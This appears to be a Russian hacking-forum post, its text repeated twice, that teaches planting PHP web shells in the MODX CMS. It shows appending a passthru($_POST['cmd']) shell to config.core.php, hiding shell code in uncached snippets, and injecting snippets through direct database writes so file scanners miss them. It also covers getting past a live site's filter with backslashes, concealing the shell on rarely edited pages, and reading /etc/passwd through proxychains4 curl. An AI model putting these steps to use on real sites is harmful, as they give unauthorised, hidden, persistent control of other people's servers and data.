Всем привет!
Сегодня я решил поделиться с вами своими личными исследованиями по внедрению шеллов в CMS MODX.
Эта CMS не такая популярная и распространённая как Wordpress или Joomla. Просто она не такая дружелюбная к пользователю, и «любая домохозяйка» не сможет быстро разобраться как делать сайт, так как здесь свой специфичный подход, основанный на применении чанков. сниппетов и плагинов.
Тем не менее на мо́дэкс написано порядка 3-4% сайтов, что в итоге выливается в довольно приличное количество. Сама CMS больше защищена в сравнении с более популярными системами, и под неё практически нет никакой информации по взлому.
Всё что удалось найти в сети - это старое упоминание команды, которая сейчас не работает, так как всё уже изменилось. Попробуйте например набрать «modx залить шелл» или что-то похожее, и убедитесь сами.
Приступим – заходим на официальный сайт
Допустим мы попали в админку на реальном сайте. Что в первую очередь проверяют? Как правило загрузку файлов. Здесь это не прокатит, по-умолчанию уже встроена защита от враждебных файлов.
Теперь попробуем по-другому, сначала загрузим txt, а потом переименуем. И опять поджидает неудача – переименовать файл тоже не даёт.
Тем не менее возможность заливки шелла есть. Рассмотрим несколько способов.
1 Способ – самый простой.
Отредактировать уже существующие php-файлы. Возьмём config.core.php во вкладке «Файлы», и добавим в конец простенький шелл. Всё успешно сохранилось.
Проверяем работоспособность, всё работает.
Точно такую же операцию можно сделать и вторым способом. Зайти медиа --> управление медиа --> редактировать config.core.php вставляем echo passthru($_POST['cmd']); --> сохраняем
Всё бы хорошо, но на реальном сайте эти изи-способы часто будут недоступны. Вы редактируете файл, потираете руки и… а где же кнопка сохранить? А нету )))
2 Способ – создание сниппета.
Можно как создать новый сниппет, так и отредактировать уже любой имеющийся. Во вкладке Элементы нажимает значок с плюсиком возле сниппета, появится окно, в котором мы напишем произвольное название сниппета, в теле его разместим шелл и сохраним.
После сохранения мы увидим новый сниппет в списке.
Сам по себе сниппет ничего не даёт – это заготовка с любым кодом, которую можно вставлять в любую страницу, что мы сейчас и сделаем. Чтобы вставить сниппет в страницу, используется команда с двойными квадратными скобками, в которые заключается название сниппета [[hello]].
Но для наших целей это не подходящий вариант, так как модэкс всё и вся кэширует, а значит команда сработает всего 1 раз. Чтобы принудительно отключить кэширование, нужно добавить в начало восклицательный знак [[!hello]].
Заходим в ресурсы, вставляем в главную страницу наш код и сохраняем.
Проверяем, и убеждаемся что всё сработало.
Вот и чудненько! Способ работает всегда, однако есть и минус – новый сниппет будет виден в админке. Правда есть довольно много сайтов, которые весьма редко обновляются, но тут уж как повезёт. Поэтому заполучив шелл, нужно подстраховаться и залить уже другие шеллы на сервер в директории доступные для записи.
Есть и преимущество у данного вида шелла через сниппет – он не существует в виде файла, поэтому на сервере его просто нет. Поэтому никакие сканеры/антивирусы его обнаружить не могут. А куда же он девается? Так в базу же ) Сниппеты хранятся в базе, а значит у нас есть ещё один способ получить шелл.
3 Способ – заливаемся через базу.
Прекрасный способ залить шелл, если нету доступа к админке, но есть доступ к базе. Доступ к базе может быть получен разными путями – захват SSH, PhpMyAdmin, найденный чужой шелл и т.д. К слову говоря, модэкс создаёт хэш паролей по собственному алгоритму, и в онлайн-сервисах значения таких хэшей подобрать не получится.
Этот способ возможен не всегда. Если у юзера базы права будут только на SELECT, то запись будет невозможна.
Здесь совсем не так просто, нужно хорошо знать и конкретный столбец, и с какими параметрами это всё лить. Но у меня уже всё исследовано, поэтому отсыплю вам привата )
Кстати заливка в базу просто прекрасно пройдёт, в то время как даже с правами root базы в большинстве случаев не получится записать файл напрямую на сервер.
Последовательность будет точно такая же – сначала нужно создать сниппет. Отправляем команду:
Обратите внимание – если мы набирает имя сниппета которое уже существует, то получим ошибку, так как сниппет не перезапишется. Ну что же, сниппет успешно создан, теперь его нужно внедрить в страницу. Пишем новую команду и отправляем:
Просто отлично – всё фурычит, создалась новая страничка Шляпа с id 20, соответственно id нужно указывать такой, какого нет на сайте. В противном случае, словите ошибку.
Но ведь создать новую страницу довольно палевно, разумнее добавить сниппет в уже существующую. И этот вопрос довольно просто решается через обновление данных в базе. Обновляем контент.. вуаля! В главной уже наш сниппет [[!hello2]].
После тренировки на локалке, проворачиваем те же самые манипуляции на боевом сайте, и посмотрим как пойдёт. На реальном сайте отработала защита, и первый запрос получил по рогам ))) Ну не беда, обойдём фильтр, используя обратный слэш.
А вот с таким запросом всё гут!
Соответственно следующим запросом наш сниппет page3 внедряем с нужную страницу. Немного привата я оставлю за кадром – как залить шелл в любую конкретную страницу, а также как массово лить сразу во много страниц. Для пытливых умов, которые без проблем орудуют с запросами MySQL, уже разобраться не составит никакого труда по практически готовой схеме.
Заливаться нужно в ту страницу, в которую много лет может никто не залазить. Ну вы знаете такие страницы, которые не обновляют даже на больших бордах, типа “О нас”, “Кто мы?” и т.п. Проверяю работоспособность, отправляю запрос proxychains4 curl -d "a=cat /etc/passwd" -X POST
И в теле HTML обнаруживаем нужный ответ с сервера:
Ну что же друзья, вот вы и получили единственное в сети руководство по внедрению шеллов в MODX.
На этом всё, всем пока!
Сегодня я решил поделиться с вами своими личными исследованиями по внедрению шеллов в CMS MODX.
Эта CMS не такая популярная и распространённая как Wordpress или Joomla. Просто она не такая дружелюбная к пользователю, и «любая домохозяйка» не сможет быстро разобраться как делать сайт, так как здесь свой специфичный подход, основанный на применении чанков. сниппетов и плагинов.
Тем не менее на мо́дэкс написано порядка 3-4% сайтов, что в итоге выливается в довольно приличное количество. Сама CMS больше защищена в сравнении с более популярными системами, и под неё практически нет никакой информации по взлому.
Всё что удалось найти в сети - это старое упоминание команды, которая сейчас не работает, так как всё уже изменилось. Попробуйте например набрать «modx залить шелл» или что-то похожее, и убедитесь сами.
Приступим – заходим на официальный сайт
Ссылка скрыта от гостей
и скачиваем дистрибутив. Быстренько делаем базу и разворачиваем у себя на локалке, например, в каталоге modx. В админке нас встретит единственная главная страница с текстом-рыбой, который сразу удаляем, и пишем что-нибудь покороче, например, Bla-bla-bla.
Допустим мы попали в админку на реальном сайте. Что в первую очередь проверяют? Как правило загрузку файлов. Здесь это не прокатит, по-умолчанию уже встроена защита от враждебных файлов.
Теперь попробуем по-другому, сначала загрузим txt, а потом переименуем. И опять поджидает неудача – переименовать файл тоже не даёт.
Тем не менее возможность заливки шелла есть. Рассмотрим несколько способов.
1 Способ – самый простой.
Отредактировать уже существующие php-файлы. Возьмём config.core.php во вкладке «Файлы», и добавим в конец простенький шелл. Всё успешно сохранилось.
Проверяем работоспособность, всё работает.
Точно такую же операцию можно сделать и вторым способом. Зайти медиа --> управление медиа --> редактировать config.core.php вставляем echo passthru($_POST['cmd']); --> сохраняем
Всё бы хорошо, но на реальном сайте эти изи-способы часто будут недоступны. Вы редактируете файл, потираете руки и… а где же кнопка сохранить? А нету )))
2 Способ – создание сниппета.
Можно как создать новый сниппет, так и отредактировать уже любой имеющийся. Во вкладке Элементы нажимает значок с плюсиком возле сниппета, появится окно, в котором мы напишем произвольное название сниппета, в теле его разместим шелл и сохраним.
После сохранения мы увидим новый сниппет в списке.
Сам по себе сниппет ничего не даёт – это заготовка с любым кодом, которую можно вставлять в любую страницу, что мы сейчас и сделаем. Чтобы вставить сниппет в страницу, используется команда с двойными квадратными скобками, в которые заключается название сниппета [[hello]].
Но для наших целей это не подходящий вариант, так как модэкс всё и вся кэширует, а значит команда сработает всего 1 раз. Чтобы принудительно отключить кэширование, нужно добавить в начало восклицательный знак [[!hello]].
Заходим в ресурсы, вставляем в главную страницу наш код и сохраняем.
Проверяем, и убеждаемся что всё сработало.
Вот и чудненько! Способ работает всегда, однако есть и минус – новый сниппет будет виден в админке. Правда есть довольно много сайтов, которые весьма редко обновляются, но тут уж как повезёт. Поэтому заполучив шелл, нужно подстраховаться и залить уже другие шеллы на сервер в директории доступные для записи.
Есть и преимущество у данного вида шелла через сниппет – он не существует в виде файла, поэтому на сервере его просто нет. Поэтому никакие сканеры/антивирусы его обнаружить не могут. А куда же он девается? Так в базу же ) Сниппеты хранятся в базе, а значит у нас есть ещё один способ получить шелл.
3 Способ – заливаемся через базу.
Прекрасный способ залить шелл, если нету доступа к админке, но есть доступ к базе. Доступ к базе может быть получен разными путями – захват SSH, PhpMyAdmin, найденный чужой шелл и т.д. К слову говоря, модэкс создаёт хэш паролей по собственному алгоритму, и в онлайн-сервисах значения таких хэшей подобрать не получится.
Этот способ возможен не всегда. Если у юзера базы права будут только на SELECT, то запись будет невозможна.
Здесь совсем не так просто, нужно хорошо знать и конкретный столбец, и с какими параметрами это всё лить. Но у меня уже всё исследовано, поэтому отсыплю вам привата )
Кстати заливка в базу просто прекрасно пройдёт, в то время как даже с правами root базы в большинстве случаев не получится записать файл напрямую на сервер.
Последовательность будет точно такая же – сначала нужно создать сниппет. Отправляем команду:
Обратите внимание – если мы набирает имя сниппета которое уже существует, то получим ошибку, так как сниппет не перезапишется. Ну что же, сниппет успешно создан, теперь его нужно внедрить в страницу. Пишем новую команду и отправляем:
Просто отлично – всё фурычит, создалась новая страничка Шляпа с id 20, соответственно id нужно указывать такой, какого нет на сайте. В противном случае, словите ошибку.
Но ведь создать новую страницу довольно палевно, разумнее добавить сниппет в уже существующую. И этот вопрос довольно просто решается через обновление данных в базе. Обновляем контент.. вуаля! В главной уже наш сниппет [[!hello2]].
После тренировки на локалке, проворачиваем те же самые манипуляции на боевом сайте, и посмотрим как пойдёт. На реальном сайте отработала защита, и первый запрос получил по рогам ))) Ну не беда, обойдём фильтр, используя обратный слэш.
А вот с таким запросом всё гут!
Соответственно следующим запросом наш сниппет page3 внедряем с нужную страницу. Немного привата я оставлю за кадром – как залить шелл в любую конкретную страницу, а также как массово лить сразу во много страниц. Для пытливых умов, которые без проблем орудуют с запросами MySQL, уже разобраться не составит никакого труда по практически готовой схеме.
Заливаться нужно в ту страницу, в которую много лет может никто не залазить. Ну вы знаете такие страницы, которые не обновляют даже на больших бордах, типа “О нас”, “Кто мы?” и т.п. Проверяю работоспособность, отправляю запрос proxychains4 curl -d "a=cat /etc/passwd" -X POST
Ссылка скрыта от гостей
И в теле HTML обнаруживаем нужный ответ с сервера:
Ну что же друзья, вот вы и получили единственное в сети руководство по внедрению шеллов в MODX.
На этом всё, всем пока!
